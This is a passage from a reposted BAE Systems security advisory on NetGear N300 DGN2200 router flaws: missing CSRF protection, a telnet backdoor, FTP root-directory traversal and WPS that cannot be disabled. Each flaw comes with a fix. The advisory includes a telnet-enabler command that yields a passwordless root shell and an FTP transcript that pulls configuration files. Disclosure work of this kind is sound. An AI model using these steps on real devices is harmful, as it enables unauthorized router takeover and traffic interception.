NetGear N300 DGN2200多个安全漏洞(3)


Solution
--------
Validate untrusted user input using a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops (‘.’) and hyphens ('-').

4.  No Cross-Site Request Forgery (CSRF) Protection
===================================================

Requires
--------
Luring a logged in admin user into following a malicious link 


Description
-----------
An attacker can lure a user into following an untrusted link to a malicious webpage that will exploit the lack of CSRF protection by forcing the user's web browser to perform unwanted actions, such as altering firewall rules. This attack returns no information to the attacker, so it is effectively 'blind', however this does not detract from the threat.

The command execution vulnerabilities described above can be performed through CSRF.


Impact
------
Using this vulnerability, BAE Systems was able to update configuration of the device, including changing WPA keys, alter firewall rules and perform command execution through exploitation of the ping and DNS features.


Solution
--------
Include an anti-CSRF token in all web forms and ensure that the token is present and correct when HTTP requests for actions are received.

5.  Gearguy/Geardog Telnet Backdoor
===================================

Requires
--------
Ability to telnet to port 23 (only on LAN side by default) 


Description
-----------
There is a backdoor (feature) built into many NetGear devices, where a user can gain operating system command access without requiring a password. This issue has been previously reported in other NetGear devices.

NetGear provides a windows executable to do this. A Linux client is available from

Send a Blowfish encrypted message to port 23 from the LAN. When you reconnect, it provides a shell without a password required.


Impact
------
Using this vulnerability, BAE Systems was able to gain a root shell on the underlying Linux operating system without supplying any authentication credentials. This would allow complete device compromise, which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Proof of concept
----------------
python telnet-enabler.py 192.168.0.1 "204E7F2172C8" Gearguy Geardog
Sent telnet enable payload to '192.168.0.1:23'


Solution
--------
Remove the backdoor feature from the device. If a ‘last resort’ admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function.

6.  FTP Insecure Root Directory
===============================

Requires
--------
FTP to be enabled (not enabled by default)


Description
-----------
The FTP server allows a user to access configuration files and to traverse outside the folder that contains files intended to be shared by FTP.
It is possible to list and retrieve files in the / folder, however the user is restricted from using the cd or CWD command to change the current directory to '/'.


Impact
------
Using this vulnerability, BAE Systems was able to gain access to sensitive configuration files.


Proof of concept
----------------
    root@bt# ftp 192.168.0.1
    Connected to 192.168.0.1.
    230 User logged in.
    Name (192.168.0.1:root): ftp
    230 User logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT 192.168.0.6:49211 OK
    150 BINARY data connection established.
    lrwxrwxrwx  1 nobody  root    18 Jan 01  2003 USB_Storage
    226 Directory list has been submitted.
    ftp> cd /
  550 Error: Access Denied.
    ftp> ls /
    200 PORT 192.168.0.6:55927 OK
    150 BINARY data connection established.
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 all_no_password
    -rw-r--r--  1 nobody  root    1700 Jan 01  2003 bftpd.conf
    drwxr-xr-x  3 nobody  root    0 Jan 01  2003 conf
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 lan3_time
    -r--r--r--  1 nobody  root    1430 Jan 01  2003 lan_dev
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 lan_time
    drwxr-xr-x  48 nobody  root    0 Jan 01  2003 mnt
    -rw-r--r--  1 nobody  root    1 Jan 01  2003 opendns.flag
    -rw-r--r--  1 nobody  root    0 Jan 01  2003 opendns.tbl
    -rw-r--r--  1 nobody  root    0 Jan 01  2003 opendns_auth.tbl
    drwxr-xr-x  2 nobody  root    0 Jan 01  2003 ppp
    -rw-r--r--  1 nobody  root    38 Jan 01  2003 resolv.conf
    -rw-r--r--  1 nobody  root    208 Jan 01  2003 ripd.conf
    drwxr-xr-x  4 nobody  root    0 Jan 01  2003 samba
    drwxr-xr-x  2 nobody  root    0 Jan 01  2003 shares
    -rw-r--r--  1 nobody  root    262 Jan 01  2003 space_info
    -rw-------  1 nobody  root    2 Oct 14 14:15 timesync
    -rw-r--r--  1 nobody  root    242 Jan 01  2003 udhcpd.conf
    -rw-r--r--  1 nobody  root    0 Jan 01  2003 udhcpd.leases
    -rw-r--r--  1 nobody  root    4 Jan 01  2003 udhcpd.pid
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 udhcpd_resrv.conf
    -rw-r--r--  1 nobody  root    3562 Jan 01  2003 upnp_xml
    drwxr-xr-x  2 nobody  root    0 Jan 01  2003 usb_vol_name
    drwxr-xr-x  11 nobody  root    0 Jan 01  2003 var
    -r--r--r--  1 nobody  root    1922 Jan 01  2003 wan_dev
    -rw-r--r--  1 nobody  root    3 Jan 01  2003 wan_time
    drwxr-xr-x  2 nobody  root    0 Jan 01  1999 wlan
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 wlan_time
    -rw-r--r--  1 nobody  root    0 Jan 01  2003 zebra.conf
    226 Directory list has been submitted.
    ftp>
  ftp> get /bftpd.conf
  local: ./bftpd.conf remote: /bftpd.conf
  200 PORT 192.168.0.5:53750 OK
  150 BINARY data connection established.
  226 File transmission successful.
  1454 bytes received in 0.00 secs (3256.7 kB/s)


Solution
--------
Enforce the folder restriction to the /shares folder for all FTP commands.

7.  Cannot Disable WPS
======================

Requires
--------
Local proximity and WiFi enabled

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/66210a44fb37e8f0727b488fcf93708a.html